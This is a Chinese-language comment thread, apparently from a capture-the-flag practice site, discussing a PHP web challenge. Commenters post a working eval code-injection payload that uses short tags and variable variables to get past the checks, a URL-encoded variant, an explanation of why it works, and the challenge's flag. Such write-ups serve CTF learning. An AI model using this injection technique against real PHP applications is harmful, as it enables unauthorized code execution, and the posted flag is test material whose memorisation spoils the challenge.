http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333
小白花了50分钟带做带理解,感觉做出来的人太天才了,把php玩的这么六,深刻的感受到web的上限就是web开发能力。
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111
flag{78062956}
好难
但是不精通php不会写,就很难受,只能看别人的writeup的payload
这题关键在于eval函数,绕过前面几个if的判断条件进入到最后一个if判断条件,由于存在eval函数,可以构造php代码执行,直接输出flag,这题有意思!!
牛皮
...
评论
YUMEKO 15天前
举报
http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333
15614005380 1月前
举报
小白花了50分钟带做带理解,感觉做出来的人太天才了,把php玩的这么六,深刻的感受到web的上限就是web开发能力。
Daniel2023 1月前
举报
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
coo1an 5月前
举报
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111
110-没办法 9月前
举报
flag{78062956}
wxy1343 10月前
举报
flag{78062956}
w登临意 1年前
举报
好难
阿Q啊 1年前
举报
但是不精通php不会写,就很难受,只能看别人的writeup的payload
阿Q啊 1年前
举报
这题关键在于eval函数,绕过前面几个if的判断条件进入到最后一个if判断条件,由于存在eval函数,可以构造php代码执行,直接输出flag,这题有意思!!
哎嘿嘿1314 1年前
举报
牛皮